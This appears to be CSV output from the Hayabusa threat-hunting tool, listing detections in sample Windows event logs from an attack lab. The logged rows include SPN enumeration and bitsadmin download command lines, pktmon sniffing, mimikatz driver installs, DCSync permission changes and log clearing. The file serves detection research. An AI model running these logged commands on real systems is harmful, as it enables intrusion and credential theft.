details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-01-30 18:13:17.686 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-01-30 18:13:17.717 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-01-30 18:13:17.717 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-01-30 18:13:17.733 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-01-30 18:13:17.733 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: setspn -T offsec -Q */* | Process: C:\Windows\System32\setspn.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x161c887 | PID: 3360 | PGUID: 7CF65FC7-E247-6017-0804-000000001B00 | Hash: SHA1=3B8C77CC25CF382D51B418CB9738BA99C3FDBAA9,MD5=C729DEA1888B1B047F51844BA5BD875F,SHA256=E3B06217D90BD1A2C12852398EA0E85C12E58F0ECBA35465E3DC60AC29AC0DC9,IMPHASH=6CBDE380709080AA31FA97FC18EF504E",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,CredAccess,Possible SPN Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
2021-02-04 00:17:16.085 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d8 | User: MSSQL01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx
2021-02-04 00:33:16.107 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sqlcmd -S .\RADAR,2020 | Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\SQLCMD.EXE | PID: 0x1204 | User: admmig | LID: 0x372a4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-sqlcmd tool abuse in SQL Server.evtx
2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx
2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx
2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx
2021-02-08 22:01:11.198 +09:00,WIN10-client01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b1c | User: WIN10-CLIENT01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx
2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
2021-02-23 07:57:19.435 +09:00,jump01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2004-Any any firewall rule created.evtx
2021-02-23 08:07:20.794 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: bitsadmin /transfer hackingarticles https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg c:\ignite.png | Path: C:\Windows\System32\bitsadmin.exe | PID: 0x1e00 | User: admmig | LID: 0x92e21,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx
2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: hackingarticles | URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx
2021-02-23 08:08:02.534 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c30 | User: JUMP01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx
2021-03-03 19:24:12.402 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Office Click-to-Run Service | Path: ""C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"" /service | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-03 19:33:48.102 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Search in Bing | Path: ""C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: ab170ec9.png | URL: https://i.imgur.com/IFpvPlt.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: efc1a28b.png | URL: https://i.imgur.com/IFpvPlt.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe | URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe | URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-17 00:50:54.591 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: Npcap Packet Driver (NPCAP) | Path: \SystemRoot\system32\DRIVERS\npcap.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-26 06:56:19.530 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon filter add -p 80 | Path: C:\Windows\System32\PktMon.exe | PID: 0x16d0 | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:56:32.794 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon comp list | Path: C:\Windows\System32\PktMon.exe | PID: 0x2b0c | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:56:50.874 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stpop | Path: C:\Windows\System32\PktMon.exe | PID: 0x2bdc | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:56:53.090 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stop | Path: C:\Windows\System32\PktMon.exe | PID: 0x1bc0 | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:57:05.324 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: FX-BS7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:57:11.415 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb60 | User: FX-BS7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,info,Persis,Service Installed,Name: mimidrv | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | User: admmig | SrvAccount: LocalSystem | SrvType: 0x1 | SrvStartType: 2 | LID: 0xcc3c3,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,CredAccess | Exec,Credential Dumping Tools Service Execution,,../hayabusa-rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
